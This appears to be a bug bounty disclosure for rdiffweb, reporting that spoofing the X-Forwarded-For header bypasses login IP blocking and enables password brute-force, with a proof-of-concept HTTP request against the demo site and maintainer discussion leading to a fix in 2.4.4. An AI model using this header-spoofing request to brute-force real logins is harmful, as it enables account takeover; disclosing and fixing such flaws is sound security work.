Bypass IP detection to brute-force password in ikus060/rdiffweb in ikus060/rdiffweb

Valid

Reported on

Sep 14th 2022

Description

In login API, by default, the IP address will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://rdiffweb-demo.ikus-soft.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://rdiffweb-demo.ikus-soft.com/login/?redirect=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 127.0.0.202 // Change IP
Connection: close

login=admin&password=admin123&redirect=%2F

Video POC

https://drive.google.com/drive/folders/1q9u_1RZMAbCOwG0_ld_RupJEKF1WyM0b?usp=sharing

Impact

This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago
ikus060/rdiffweb maintainer has acknowledged this report a year ago
Patrik Dufresne
a year ago

Maintainer

@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy the X-Forward-* header get replace by apache or nginx. In case of https://rdiffweb-demo.ikus-soft.com/ the vulnerability is not reproducable.

Chiencp
a year ago

Researcher

In the demo video I'm doing the attack right on https://rdiffweb-demo.ikus-soft.com/ site itself, while the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability a year ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a year ago

Maintainer

@co0k13-cypher May you plz change the affected version to 2.4.2 and earlier ?

Patrik Dufresne marked this as fixed in 2.4.4 with commit 28258e a year ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability will not receive a CVE
Chiencp
a year ago

Researcher

I'm sorry the report was closed so i can't edit !

Patrik Dufresne
a year ago

Maintainer

@admin May you help to change the affected version to 2.4.2 and earlier ?

Jamie Slome
a year ago

Admin

Sorted :)

to join this conversation